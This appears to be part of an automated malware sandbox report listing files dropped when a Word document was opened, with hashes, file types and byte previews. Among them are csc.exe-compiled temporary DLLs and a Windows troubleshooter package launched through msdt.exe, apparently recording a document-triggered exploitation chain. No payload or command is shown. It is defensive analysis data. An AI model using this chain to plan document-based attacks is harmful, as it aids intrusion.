                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:6Mpqb927GslPTDRjyJzUqk1ul9Ya3CXq:yc7GBngK
                                                                                                                                                                      MD5:ADB5E57D74F7163C69FDDD5E4C558B3E
                                                                                                                                                                      SHA1:9EE08CCEB0455D17703305B0B5D6F097B3ECF8F4
                                                                                                                                                                      SHA-256:2001B98EB83553A8E98D1F9D805E35D2142DF19797CC8F8DA3C022CE4703BAB2
                                                                                                                                                                      SHA-512:347C7FC03AB4AD52C10BB043BB6674AA5F78AAEA990CE3408A75FAADC4867ECA4941A23E6791553A42C7D39C98B6ABED5495EB96DC2DBD4DCBE173947A5665A0
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b...........!.................%... ...@....... ....................................@..................................$..K....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................%......H........ ..4............................................................0..6....... ....s........o....(....,..o....r...pr...po....*~....*F.r...pr...po....*..(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......t...#Blob...........W=........%3............................................................................2.+...N.B.....................0.....W.......+.............................Q.9.......... \.....P ......j...... ..

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\jsmb0bcn\CSC77C6618222CF46A59B8ECBD8FB1D6F27.TMP

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                      File Type:MSVC .res
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):652
                                                                                                                                                                      Entropy (8bit):3.0847603083748942
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryYlaak7YnqqblrPN5Dlq5J:+RI+ycuZhNGaakSBrPNnqX
                                                                                                                                                                      MD5:1C1BF3AFED4F5BA8F10BCE345034B034
                                                                                                                                                                      SHA1:DDA7FB76DCE980761AB4556881C03C78A48D52B9
                                                                                                                                                                      SHA-256:AC5E922DC8E9C57B427F4ACAFEF0F4F0F28BD6171E74064A3073B772975723D3
                                                                                                                                                                      SHA-512:2327C8D53199C3983F1047D1BD7E99077B67596149739EEEA58BDD72C6072718E9DFFBA4F3D8628E4D7A859D2716C5EE46D93BE67D3C6BA35B0DCCAB35C79B45
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...j.s.m.b.0.b.c.n...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...j.s.m.b.0.b.c.n...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\jsmb0bcn\jsmb0bcn.dll

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):5120
                                                                                                                                                                      Entropy (8bit):3.782137158953932
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:6WoPhmKraYZkH8KTibUy9kwjj0JcC+CFSlwY/c1ulGaa3BBq:MDaAkHHonk8HCuHpK
                                                                                                                                                                      MD5:B48A80632C10E39F90AC036D98DF4ED5
                                                                                                                                                                      SHA1:D6FA61076E1CB021806E6E7595134AFD686A0EBC
                                                                                                                                                                      SHA-256:0142366EE911D20D14E1F07AED7D53D4658AD877A6FB23CD8AE09B103C8F5AC5
                                                                                                                                                                      SHA-512:9C87704F1215B09AEF89B5AEFD41F18BDBCCD56A744446218D45446FF66F035C430F82FE24DE21FB7EF06562559E6CC695A8FB0512C7DE4CFFFA5542D367626D
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...}..b...........!................>*... ...@....... ....................................@..................................)..S....@.......................`....................................................... ............... ..H............text...D.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................ *......H....... ".............................................................."..(....*J.#(....r...p(....*..(....*2~.....(....*....0.......... ....s..... ....s...............r;..p.........(......s.............5.....".....5.....3+E...../...(.-...2.3+1...:3...+)....3...+....+...+...+...+...,...+...+......r;..p...o................ ...o.........+Y.......r=..p..o......1.r=..p..o..........+(r...p..o...........(........r...p(.........X.......i2..........(.........o........o....-.r...p....

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\doc782.LNK

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 08:43:10 2022, mtime=Tue Jun 7 15:44:09 2022, atime=Tue Jun 7 15:43:52 2022, length=10144, window=hide
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1040
                                                                                                                                                                      Entropy (8bit):4.709404002328391
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:8lu4mpRUJpduCH2+CgSqD4yVAJuSc5A+WnvZDFLmAjAV/D0lHm2NDHfi44t2Y+x4:8luJeXFSqr8rc5iNAVbQD57aB6m
                                                                                                                                                                      MD5:DB80B5F0A185E185CB8D8DC0EAFAACC2
                                                                                                                                                                      SHA1:9BC60C42D61BB923DEB4E0C687B0688382CF699C
                                                                                                                                                                      SHA-256:A582A9A48E44D2D8F93DCE977D213BC05891B39ACF6D3D22948E50BCA9646D5C
                                                                                                                                                                      SHA-512:477139D5680F860D05C2E7A633307833B7AF9898C312EAFF40B9AD50B12BABB4A835BDE4E04FA432FD8FA2C97334F4F4FD7E29C049A4D8F057DDFF2D8C56AB2E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:L..................F.... ...Ga#..2..,P..z..h.<.z...'...........................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...Tr.....................:......;..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....hTgM..user.<.......N...Tr.....#J....................b...j.o.n.e.s.....~.1.....hTkM..Desktop.h.......N...Tr......Y..............>.........D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....d.2..'...T{. .DOC782~1.DOC..H......hTfM.T{......V.....................p..d.o.c.7.8.2...d.o.c.x.......Q...............-.......P...........>.S......C:\Users\user\Desktop\doc782.docx..".....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.o.c.7.8.2...d.o.c.x.........:..,.LB.)...As...`.......X.......965543...........!a..%.H.VZAj....'$.............!a..%.H.VZAj....'$........................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x..

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):64
                                                                                                                                                                      Entropy (8bit):4.601202445739505
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:bDuMJlZIbFXCmxWKIbFXCv:bCSa6c
                                                                                                                                                                      MD5:538F5016C24249AC1799BBBB20B4BD97
                                                                                                                                                                      SHA1:1B0ECD98E7D3BFECA78B00528138FA8D84F35BED
                                                                                                                                                                      SHA-256:249CC3AF3819FB4142D7A65254BD454ACF580489E19A50D71007A7E998B4A70F
                                                                                                                                                                      SHA-512:E0E8040389BABFFD046E57AAD3ECFEE9A9171B4D00EC75EE3DF48710FC452C479692121776D17DCBCCC72E4A1CA0B6570484C007B282C9DBF05EDD34C9463EDA
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:[folders]..Templates.LNK=0..doc782.LNK=0..[misc]..doc782.LNK=0..

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):162
                                                                                                                                                                      Entropy (8bit):2.183415143652617
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Rl/Zde8FxlqKT2k3ll//olF883nl1Z:RtZWI2kVWF
                                                                                                                                                                      MD5:F7D5777AA9278B2A2C2AE07E96521B27
                                                                                                                                                                      SHA1:AAF2BC43AA48170626C2808D24E763C51F5F53F8
                                                                                                                                                                      SHA-256:E60F7AAEAED18B9A530A2D3333F621D427C071EE7DB6C2670BC131583E9CCEA0
                                                                                                                                                                      SHA-512:E27638644E0E69ADB7D4D13DF3AF49641C995B22AC69F2B614B0CBF5A29CA81C1560FAFA2E4C4062155F36E20DD9E5EFFACAF277A56FEA86F1A05DE23CF6A332
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:.pratesh................................................p.r.a.t.e.s.h..............&..........H.......6C...........'...............................(..............

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                      File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):20
                                                                                                                                                                      Entropy (8bit):2.8954618442383215
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:QVNliGn:Q9rn
                                                                                                                                                                      MD5:C4F79900719F08A6F11287E3C7991493
                                                                                                                                                                      SHA1:754325A769BE6ECCC664002CD8F6BDB0D0B8CA4D
                                                                                                                                                                      SHA-256:625CA96CCA65A363CC76429804FF47520B103D2044BA559B11EB02AB7B4D79A8
                                                                                                                                                                      SHA-512:0F3C498BC7680B4C9167F790CC0BE6C889354AF703ABF0547F87B78FEB0BAA9F5220691DF511192B36AD9F3F69E547E6D382833E6BC25CDB4CD2191920970C5F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:..p.r.a.t.e.s.h.....

                                                                                                                                                                      C:\Users\user\Desktop\~$doc782.docx

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):162
                                                                                                                                                                      Entropy (8bit):2.183415143652617
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Rl/Zde8FxlqKT2k3ll//olF883nl1Z:RtZWI2kVWF
                                                                                                                                                                      MD5:F7D5777AA9278B2A2C2AE07E96521B27
                                                                                                                                                                      SHA1:AAF2BC43AA48170626C2808D24E763C51F5F53F8
                                                                                                                                                                      SHA-256:E60F7AAEAED18B9A530A2D3333F621D427C071EE7DB6C2670BC131583E9CCEA0
                                                                                                                                                                      SHA-512:E27638644E0E69ADB7D4D13DF3AF49641C995B22AC69F2B614B0CBF5A29CA81C1560FAFA2E4C4062155F36E20DD9E5EFFACAF277A56FEA86F1A05DE23CF6A332
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:.pratesh................................................p.r.a.t.e.s.h..............&..........H.......6C...........'...............................(..............

                                                                                                                                                                      C:\Windows\Temp\SDIAG_1b5cafbf-8d40-4ed6-8603-5062d6c68751\DiagPackage.diagpkg

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                      File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):24702
                                                                                                                                                                      Entropy (8bit):4.37978533849437
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:fO3MDP8m2xaqade1tXv8v/XPSwTkal+7lOaNeHdXQZvczyJuz4UnPz0Kuz+NGTEP:O5NzuCWNaEcU8mjapMVOHW
                                                                                                                                                                      MD5:191959B4C3F91BE170B30BF5D1BC2965
                                                                                                                                                                      SHA1:1891E3CB588516B94FDC53794DA4DF5469A4C6D0
                                                                                                                                                                      SHA-256:8EC3A8F67BAF1E4658FC772F9F35230CA1B0318DDAF7A4C84789A329B6F7F047
                                                                                                                                                                      SHA-512:092CC417FBFE7F6E02A60FF169209D7B60362B585CBF92521BFC71C0B378D978DFB9265A3E48C630CE6ABAB263711D71F3917FFAF51B6FD449CFC394E9D8C3A9
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:<dcmPS:DiagnosticPackage SchemaVersion="1.0" Localized="true" xmlns:dcmPS="http://www.microsoft.com/schemas/dcm/package/2007" xmlns:dcmRS="http://www.microsoft.com/schemas/dcm/resource/2007">.. <DiagnosticIdentification>.. <ID>PCW</ID>.. <Version>3.0</Version>.. </DiagnosticIdentification>.. <DisplayInformation>.. <Parameters/>.. <Name>@diagpackage.dll,-1</Name>.. <Description>@diagpackage.dll,-2</Description>.. </DisplayInformation>.. <PrivacyLink>https://go.microsoft.com/fwlink/?LinkId=534597</PrivacyLink>.. <PowerShellVersion>2.0</PowerShellVersion>.. <SupportedOSVersion clientSupported="true" serverSupported="true">6.1</SupportedOSVersion>.. <Troubleshooter>.. <Script>.. <Parameters/>.. <ProcessArchitecture>Any</ProcessArchitecture>.. <RequiresElevation>false</RequiresElevation>.. <RequiresInteractivity>true</RequiresInteractivity>.. <FileName>TS_ProgramCompatibilityWizard.ps1</FileName>.. <ExtensionPoint/>.. </Script>..

                                                                                                                                                                      C:\Windows\Temp\SDIAG_1b5cafbf-8d40-4ed6-8603-5062d6c68751\DiagPackage.dll

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):66560
                                                                                                                                                                      Entropy (8bit):6.926109943059805
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:1536:ytBGLADXf3iFGQ+/ReBQBJJgUKZgyxMBGb:ytBGcDXvKoRqKuxgyx
                                                                                                                                                                      MD5:6E492FFAD7267DC380363269072DC63F
                                                                                                                                                                      SHA1:3281F69F93D181ADEE35BC9AD93B8E1F1BBF7ED3
                                                                                                                                                                      SHA-256:456AE5D9C48A1909EE8093E5B2FAD5952987D17A0B79AAE4FFF29EB684F938A8
                                                                                                                                                                      SHA-512:422E2A7B83250276B648510EA075645E0E297EF418564DDA3E8565882DBBCCB8C42976FDA9FCDA07A25F0F04A142E43ECB06437A7A14B5D5D994348526123E4E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<...R...R...R.......R...P...R.Rich..R.PE..d....J_A.........." ......................................................... .......K....`.......................................................... ..`...............................8............................................................................rdata..............................@..@.rsrc...`.... ......................@..@.....J_A........T...8...8........J_A........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....#.......rsrc$02.... .....;A.(.j..x..)V...Zl4..w.E..J_A........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                      C:\Windows\Temp\SDIAG_1b5cafbf-8d40-4ed6-8603-5062d6c68751\RS_ProgramCompatibilityWizard.ps1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                      File Type:ISO-8859 text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):50242
                                                                                                                                                                      Entropy (8bit):4.932919499511673
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:384:/wugEs5GhrQzYjGBHvPbD9FZahXuDzsP6qqF8DdEakDiqeXacgcRjdhGPtQMHQF4:/c5AMHvDDf2VE+quAiMw4
                                                                                                                                                                      MD5:EDF1259CD24332F49B86454BA6F01EAB
                                                                                                                                                                      SHA1:7F5AA05727B89955B692014C2000ED516F65D81E
                                                                                                                                                                      SHA-256:AB41C00808ADAD9CB3D76405A9E0AEE99FB6E654A8BF38DF5ABD0D161716DC27
                                                                                                                                                                      SHA-512:A6762849FEDD98F274CA32EB14EC918FDBE278A332FDA170ED6D63D4C86161F2208612EB180105F238893A2D2B107228A3E7B12E75E55FDE96609C69C896EBA0
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:# Copyright . 2008, Microsoft Corporation. All rights reserved.......#This is passed from the troubleshooter via 'Add-DiagRootCause'..PARAM($targetPath, $appName)....#RS_ProgramCompatibilityWizard..#rparsons - 05 May 2008..#rfink - 01 Sept 2008 - rewrite to support dynamic choices....#set-psdebug -strict -trace 0....#change HKLM\Software\Windows NT\CurrentVersion\AppCompatFlags\CompatTS EnableTracing(DWORD) to 1..#if you want to enable tracing..$SpewTraceToDesktop = $false....Import-LocalizedData -BindingVariable CompatibilityStrings -FileName CL_LocalizationData....#Compatibility modes..$CompatibilityModes = new-Object System.Collections.Hashtable..$CompatibilityModes.Add("Version_WIN8RTM", "WIN8RTM")..$CompatibilityModes.Add("Version_WIN7RTM", "WIN7RTM")..$CompatibilityModes.Add("Version_WINVISTA2", "VISTASP2")..$CompatibilityModes.Add("Version_WINXP3", "WINXPSP3")..$CompatibilityModes.Add("Version_MSIAUTO", "MSIAUTO")..$CompatibilityModes.Add("Version_UNKNOWN", "WINXPSP3")..$Comp

                                                                                                                                                                      C:\Windows\Temp\SDIAG_1b5cafbf-8d40-4ed6-8603-5062d6c68751\TS_ProgramCompatibilityWizard.ps1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                      File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):16946
                                                                                                                                                                      Entropy (8bit):4.860026903688885
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:384:3FptgXhu9IOM7BTDLwU7GHf7FajKFzB9Ww:Ghu9I9dQYWB9Ww
                                                                                                                                                                      MD5:2C245DE268793272C235165679BF2A22
                                                                                                                                                                      SHA1:5F31F80468F992B84E491C9AC752F7AC286E3175
                                                                                                                                                                      SHA-256:4A6E9F400C72ABC5B00D8B67EA36C06E3BC43BA9468FE748AEBD704947BA66A0
                                                                                                                                                                      SHA-512:AAECB935C9B4C27021977F211441FF76C71BA9740035EC439E9477AE707109CA5247EA776E2E65159DCC500B0B4324F3733E1DFB05CEF10A39BB11776F74F03C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:# Copyright . 2008, Microsoft Corporation. All rights reserved.......#TS_ProgramCompatibilityWizard..#rparsons - 05 May 2008....$ShortcutListing = New-Object System.Collections.Hashtable..$ExeListing = New-Object System.Collections.ArrayList..$CombinedListing = New-Object System.Collections.ArrayList....Import-LocalizedData -BindingVariable CompatibilityStrings -FileName CL_LocalizationData....# Block PCW on unsupported SKUs..$BlockedSKUs = @(178)..[Int32]$OSSKU = (Get-WmiObject -Class "Win32_OperatingSystem").OperatingSystemSKU..if ($BlockedSKUs.Contains($OSSKU))..{.. return..}....$typeDefinition = @"....using System;..using System.IO;..using System.Runtime.InteropServices;..using System.Text;..using System.Collections;....public class Utility..{.. public static string GetStartMenuPath().. {.. return Environment.GetFolderPath(Environment.SpecialFolder.StartMenu);.. }.... public static string GetAllUsersStartMenuPath().. {.. return Path.Combine(Environ

                                                                                                                                                                      C:\Windows\Temp\SDIAG_1b5cafbf-8d40-4ed6-8603-5062d6c68751\VF_ProgramCompatibilityWizard.ps1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                      File Type:ISO-8859 text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):453
                                                                                                                                                                      Entropy (8bit):4.983419443697541
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:QcM3BFN+dxmVdyKVCkLZI4S2xhzoJNIDER5lI02xzS4svc3uVr:Qb3DQbeCklTxhzoJUoS02tCr
                                                                                                                                                                      MD5:60A20CE28D05E3F9703899DF58F17C07
                                                                                                                                                                      SHA1:98630ABC4B46C3F9BD6AF6F1D0736F2B82551CA9
                                                                                                                                                                      SHA-256:B71BC60C5707337F4D4B42BA2B3D7BCD2BA46399D361E948B9C2E8BC15636DA2
                                                                                                                                                                      SHA-512:2B2331B2DD28FB0BBF95DC8C6CA7E40AA56D4416C269E8F1765F14585A6B5722C689BCEBA9699DFD7D97903EF56A7A535E88EAE01DFCC493CEABB69856FFF9AA
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:# Copyright . 2008, Microsoft Corporation. All rights reserved.......#if this environment variable is set, we say that we don't detect the problem anymore so it will..#show as fixed in the final screen..PARAM($appName)....$detected = $true..if ($Env:AppFixed -eq $true)..{.. $detected = $false ..}....Update-DiagRootCause -id "RC_IncompatibleApplication" -iid $appName -Detected $detected....#RS_ProgramCompatibilityWizard..#rparsons - 05 May 2008....

                                                                                                                                                                      C:\Windows\Temp\SDIAG_1b5cafbf-8d40-4ed6-8603-5062d6c68751\en-US\CL_LocalizationData.psd1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                      File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):6650
                                                                                                                                                                      Entropy (8bit):3.6751460885012333
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:q39pB3hpieJGhn8n/y7+aqwcQoXQZWx+cWUcYpy7I6D1RUh5EEjQB5dm:q39pRhp6Sy6wZifVEtjjFm
                                                                                                                                                                      MD5:E877AD0545EB0ABA64ED80B576BB67F6
                                                                                                                                                                      SHA1:4D200348AD4CA28B5EFED544D38F4EC35BFB1204
                                                                                                                                                                      SHA-256:8CAC8E1DA28E288BF9DB07B2A5BDE294122C8D2A95EA460C757AE5BAA2A05F27
                                                                                                                                                                      SHA-512:6055EC9A2306D9AA2F522495F736FBF4C3EB4078AD1F56A6224FF42EF525C54FF645337D2525C27F3192332FF56DDD5657C1384846678B343B2BFA68BD478A70
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:..#. .L.o.c.a.l.i.z.e.d...0.4./.1.1./.2.0.1.8. .0.2.:.0.5. .P.M. .(.G.M.T.)...3.0.3.:.4...8.0...0.4.1.1. ...C.L._.L.o.c.a.l.i.z.a.t.i.o.n.D.a.t.a...p.s.d.1.....#. .L.o.c.a.l.i.z.e.d...0.1./.0.4./.2.0.1.3. .1.1.:.3.2. .A.M. .(.G.M.T.)...3.0.3.:.4...8.0...0.4.1.1. ...C.L._.L.o.c.a.l.i.z.a.t.i.o.n.D.a.t.a...p.s.d.1.....C.o.n.v.e.r.t.F.r.o.m.-.S.t.r.i.n.g.D.a.t.a. .@.'.....#.#.#.P.S.L.O.C.....P.r.o.g.r.a.m._.C.h.o.i.c.e._.N.O.T.L.I.S.T.E.D.=.N.o.t. .L.i.s.t.e.d.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.D.E.F.A.U.L.T.=.N.o.n.e.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.8.R.T.M.=.W.i.n.d.o.w.s. .8.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.7.R.T.M.=.W.i.n.d.o.w.s. .7.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.V.I.S.T.A.2.=.W.i.n.d.o.w.s. .V.i.s.t.a. .(.S.e.r.v.i.c.e. .P.a.c.k. .2.).....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.X.P.S.P.3.=.W.i.n.d.o.w.s. .X.P. .(.S.e.r.v.i.c.e. .P.a.c.k. .3.).....V.e.r.s.i.o.n._.C.h.o.i.c.e._.M.S.I.A.U.T.O.=.S.k.i.p. .V.e.r.s.i.o.n. .C.h.e.c.k.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.U.N.

                                                                                                                                                                      C:\Windows\Temp\SDIAG_1b5cafbf-8d40-4ed6-8603-5062d6c68751\en-US\DiagPackage.dll.mui

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):10752
                                                                                                                                                                      Entropy (8bit):3.517898352371806
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:Gmw56QoV8m7t/C7eGu7tCuKFtrHQcoC1dIO4Pktmg5CuxbEWgdv0WwF:WAQovu548tmirAWu8Wm
                                                                                                                                                                      MD5:CC3C335D4BBA3D39E46A555473DBF0B8
                                                                                                                                                                      SHA1:92ADCDF1210D0115DB93D6385CFD109301DEAA96
                                                                                                                                                                      SHA-256:330A1D9ADF3C0D651BDD4C0B272BF2C7F33A5AF012DEEE8D389855D557C4D5FD
                                                                                                                                                                      SHA-512:49CBF166122D13EEEA2BF2E5F557AA8696B859AEA7F79162463982BBF43499D98821C3C2664807EDED0A250D9176955FB5B1B39A79CDF9C793431020B682ED12
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<...R...R...R.......R...P...R.Rich..R.................PE..L..................!.........(...............................................P...........@.......................................... ...$..............................8............................................................................rdata..............................@..@.rsrc....0... ...&..................@..@......E.........T...8...8.........E.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....#..0!...rsrc$02.... .......OV....,.+.(,..vA..@..E.........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                      C:\Windows\Temp\SDIAG_1b5cafbf-8d40-4ed6-8603-5062d6c68751\result\results.xsl

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):48956
                                                                                                                                                                      Entropy (8bit):5.103589775370961
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:768:hUeTHmb0+tk+Ci10ycNV6OW9a+KDoVxrVF+bBH0t9mYNJ7u2+d:hUcHXDY10tNV6OW9abDoVxrVF+bBH0tO
                                                                                                                                                                      MD5:310E1DA2344BA6CA96666FB639840EA9
                                                                                                                                                                      SHA1:E8694EDF9EE68782AA1DE05470B884CC1A0E1DED
                                                                                                                                                                      SHA-256:67401342192BABC27E62D4C1E0940409CC3F2BD28F77399E71D245EAE8D3F63C
                                                                                                                                                                      SHA-512:62AB361FFEA1F0B6FF1CC76C74B8E20C2499D72F3EB0C010D47DBA7E6D723F9948DBA3397EA26241A1A995CFFCE2A68CD0AAA1BB8D917DD8F4C8F3729FA6D244
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
